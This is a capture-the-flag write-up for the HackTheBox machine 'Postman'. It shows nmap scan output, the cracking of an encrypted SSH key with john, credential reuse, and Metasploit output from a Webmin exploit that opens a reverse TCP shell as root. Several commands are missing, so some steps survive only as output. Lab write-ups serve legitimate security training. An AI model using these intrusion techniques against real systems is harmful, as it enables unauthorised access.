HackTheBox Postman - Writeup
|Release Date:||2019/11/02 19:00|
~ User Part
Starting with a nmap-scan gives us the following results:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
drwxr-xr-x 2 root root 4096 Sep 11 11:28 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak
We got a private key, probably for the user Matt found in /etc/passwd. Unfortunately, this key is encrypted, but we can download it using scp and try to crack it using john:
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:15 DONE (2020-02-07 21:20) 0.06583g/s 944153p/s 944153c/s 944153C/s *7¡Vamos!
After changing permissions to 600 (rw-), we can try to use this private key for ssh authentication as user Matt. Unfortunately, the server immediately closes the connection. Isn't the user allowed to connect via ssh? But we can try another thing: logging back in as user redis and executing su to switch to user Matt. And indeed! We got a credential reuse. We can now easily read the user flag:
# Root Part
Doing some basic enumeration and looking at the process table (ps aux | grep root), we notice, that the webmin app running on port 10000 we found before is running as root user. We will focus on exploiting it.
[*] Started reverse TCP handler on 10.10.x.x:4444
[+] Session cookie: 56e6a17006481c0f7262e772cb3f7074
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.x.x:4444 -> 10.10.10.160:43266) at 2020-02-08 16:34:50 -0500
+ Additional Notes
Also: Run processes with minimum-required permissions only and try to encapsulate it from other software and configuration files.